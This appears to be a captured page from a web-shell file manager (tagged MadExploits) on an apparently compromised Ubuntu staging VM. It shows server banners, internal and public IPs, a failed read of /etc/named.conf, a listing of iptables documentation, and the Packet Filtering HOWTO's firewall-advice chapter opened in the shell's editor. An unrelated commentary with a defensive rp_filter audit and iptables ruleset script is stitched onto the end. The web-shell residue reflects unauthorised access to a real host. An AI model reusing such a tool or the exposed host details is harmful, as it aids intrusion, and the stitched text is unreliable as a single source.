Linux quad-clini-stageVM 5.4.0-1109-azure #115~18.04.1-Ubuntu SMP Mon May 22 20:06:37 UTC 2023 x86_64
Apache/2.4.29 (Ubuntu)
: 10.2.0.4 | : 3.137.175.166
Cant Read [ /etc/named.conf ]
7.4.25
www-data
www.github.com/MadExploits
Directory: /usr/share/doc/iptables/html/
Name                             Size       Permission
NAT-HOWTO-1.html                 1.05 KB    -rw-r--r--
NAT-HOWTO-10.html                2.39 KB    -rw-r--r--
NAT-HOWTO-11.html                836 B      -rw-r--r--
NAT-HOWTO-2.html                 4.17 KB    -rw-r--r--
NAT-HOWTO-3.html                 1.34 KB    -rw-r--r--
NAT-HOWTO-4.html                 4.22 KB    -rw-r--r--
NAT-HOWTO-5.html                 4.95 KB    -rw-r--r--
NAT-HOWTO-6.html                 8.13 KB    -rw-r--r--
NAT-HOWTO-7.html                 1.22 KB    -rw-r--r--
NAT-HOWTO-8.html                 1.04 KB    -rw-r--r--
NAT-HOWTO-9.html                 1.97 KB    -rw-r--r--
NAT-HOWTO.html                   2.53 KB    -rw-r--r--
packet-filtering-HOWTO-1.html    1.77 KB    -rw-r--r--
packet-filtering-HOWTO-10.html   2.44 KB    -rw-r--r--
packet-filtering-HOWTO-11.html   3.58 KB    -rw-r--r--
packet-filtering-HOWTO-2.html    1.48 KB    -rw-r--r--
packet-filtering-HOWTO-3.html    5.57 KB    -rw-r--r--
packet-filtering-HOWTO-4.html    2.07 KB    -rw-r--r--
packet-filtering-HOWTO-5.html    1.53 KB    -rw-r--r--
packet-filtering-HOWTO-6.html    3.35 KB    -rw-r--r--
packet-filtering-HOWTO-7.html    34.71 KB   -rw-r--r--
packet-filtering-HOWTO-8.html    1.35 KB    -rw-r--r--
packet-filtering-HOWTO-9.html    2.21 KB    -rw-r--r--
packet-filtering-HOWTO.html      2.69 KB    -rw-r--r--
Code Editor : packet-filtering-HOWTO-11.html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<HTML>
<HEAD>
<META NAME="GENERATOR" CONTENT="LinuxDoc-Tools 0.9.72">
<TITLE>Linux 2.4 Packet Filtering HOWTO: Advice on Packet Filter Design</TITLE>
<LINK HREF="packet-filtering-HOWTO-10.html" REL=previous>
<LINK HREF="packet-filtering-HOWTO.html#toc11" REL=contents>
</HEAD>
<BODY>
Next
<A HREF="packet-filtering-HOWTO-10.html">Previous</A>
<A HREF="packet-filtering-HOWTO.html#toc11">Contents</A>
<HR>
<H2><A NAME="s11">11.</A> <A HREF="packet-filtering-HOWTO.html#toc11">Advice on Packet Filter Design</A></H2>

<P>Common wisdom in the computer security arena is to block everything, then open up holes as necessary. This is usually phrased `that which is not explicitly allowed is prohibited'. I recommend this approach if security is your maximal concern.</P>
<P>Do not run any services you do not need to, even if you think you have blocked access to them.</P>
<P>If you are creating a dedicated firewall, start by running nothing, and blocking all packets, then add services and let packets through as required.</P>
<P>I recommend security in depth: combine tcp-wrappers (for connections to the packet filter itself), proxies (for connections passing through the packet filter), route verification and packet filtering. Route verification is where a packet which comes from an unexpected interface is dropped: for example, if your internal network has addresses 10.1.1.0/24, and a packet with that source address comes in your external interface, it will be dropped. This can be enabled for one interface (ppp0) like so:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
# echo 1 > /proc/sys/net/ipv4/conf/ppp0/rp_filter
#
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Or for all existing and future interfaces like this:</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
# for f in /proc/sys/net/ipv4/conf/*/rp_filter; do
#   echo 1 > $f
# done
#
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Debian does this by default where possible. If you have asymmetric routing (ie. you expect packets coming in from strange directions), you will want to disable this filtering on those interfaces.</P>
<P>Logging is useful when setting up a firewall if something isn't working, but on a production firewall, always combine it with the `limit' match, to prevent someone from flooding your logs.</P>
<P>I highly recommend connection tracking for secure systems: it introduces some overhead, as all connections are tracked, but is very useful for controlling access to your networks. You may need to load the `ip_conntrack.o' module if your kernel does not load modules automatically, and it's not built into the kernel. If you want to accurately track complex protocols, you'll need to load the appropriate helper module (eg. `ip_conntrack_ftp.o').</P>
<P>
<BLOCKQUOTE><CODE>
<PRE>
# iptables -N no-conns-from-ppp0
# iptables -A no-conns-from-ppp0 -m state --state ESTABLISHED,RELATED -j ACCEPT
# iptables -A no-conns-from-ppp0 -m state --state NEW -i ! ppp0 -j ACCEPT
# iptables -A no-conns-from-ppp0 -i ppp0 -m limit -j LOG --log-prefix "Bad packet from ppp0:"
# iptables -A no-conns-from-ppp0 -i ! ppp0 -m limit -j LOG --log-prefix "Bad packet not from ppp0:"
# iptables -A no-conns-from-ppp0 -j DROP
# iptables -A INPUT -j no-conns-from-ppp0
# iptables -A FORWARD -j no-conns-from-ppp0
</PRE>
</CODE></BLOCKQUOTE>
</P>
<P>Building a good firewall is beyond the scope of this HOWTO, but my advice is `always be minimalist'. See the Security HOWTO for more information on testing and probing your box.</P>
<HR>
Next
<A HREF="packet-filtering-HOWTO-10.html">Previous</A>
<A HREF="packet-filtering-HOWTO.html#toc11">Contents</A>
</BODY>
</HTML>
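The HOWTO's two concrete recommendations (turn on reverse-path filtering on every interface, and front INPUT/FORWARD with a connection-tracking chain whose LOG rules are rate-limited) as one script that can be run on a host to audit the first and generate the second. This is an added example, not code from the HOWTO or from this page: the function names rp_filter_audit and no_conns_ruleset, the optional sysctl-tree root argument (so a constructed tree can be used instead of /proc/sys), the default-DROP policies and the 3/min default rate are my choices. It uses current iptables syntax (`! -i` and `-m conntrack --ctstate`) where the 2.4-era text has `-i !` and `-m state`, emits iptables-restore format so the whole ruleset loads atomically, and takes into account that the kernel applies the maximum of conf/all/rp_filter and the per-interface value, which the HOWTO's one-liners do not mention.

```shell
#!/bin/sh
# Added example (not from the HOWTO or this page): audit rp_filter and
# generate the "no-conns-from-<ext>" chain as an iptables-restore fragment.

# Print interfaces on which reverse-path filtering is effectively off.
# The kernel applies max(conf/all/rp_filter, conf/<iface>/rp_filter), so
# an interface is only unprotected when both are 0.  $1 optionally roots
# the sysctl tree elsewhere (a test can pass a constructed tree).
rp_filter_audit() {
    conf="${1:-/proc/sys}/net/ipv4/conf"
    allv=0
    if [ -f "$conf/all/rp_filter" ]; then
        allv=$(cat "$conf/all/rp_filter")
    fi
    for f in "$conf"/*/rp_filter; do
        [ -f "$f" ] || continue
        iface=$(basename "$(dirname "$f")")
        case "$iface" in all|default) continue ;; esac
        v=$(cat "$f")
        if [ "$v" -lt 1 ] && [ "$allv" -lt 1 ]; then
            echo "$iface"
        fi
    done
}

# Emit the HOWTO's chain in iptables-restore format, with default-DROP
# policies on INPUT/FORWARD ("that which is not explicitly allowed is
# prohibited").  $1 = external interface, $2 = LOG rate limit (assumed
# default 3/min; the HOWTO's bare "-m limit" means iptables' 3/hour).
no_conns_ruleset() {
    ext="$1"
    rate="${2:-3/min}"
    chain="no-conns-from-$ext"
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
:$chain - [0:0]
-A $chain -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT
-A $chain -m conntrack --ctstate NEW ! -i $ext -j ACCEPT
-A $chain -i $ext -m limit --limit $rate -j LOG --log-prefix "Bad packet from $ext:"
-A $chain ! -i $ext -m limit --limit $rate -j LOG --log-prefix "Bad packet not from $ext:"
-A $chain -j DROP
-A INPUT -j $chain
-A FORWARD -j $chain
COMMIT
EOF
}

# Run directly: ./fw-policy.sh ppp0 > /etc/iptables/rules.v4
if [ -n "${1:-}" ]; then
    unprotected=$(rp_filter_audit)
    [ -z "$unprotected" ] || echo "rp_filter off on: $unprotected" >&2
    no_conns_ruleset "$1"
fi
```

Syntax-check the generated ruleset with `no_conns_ruleset ppp0 | iptables-restore --test` before loading it for real (as root, without `--test`). Because ESTABLISHED traffic is accepted first, an SSH session that is already open survives the load, while new inbound connections arriving on the external interface are dropped and logged at most `rate` times per interval, which is exactly the flood protection the `limit` paragraph asks for.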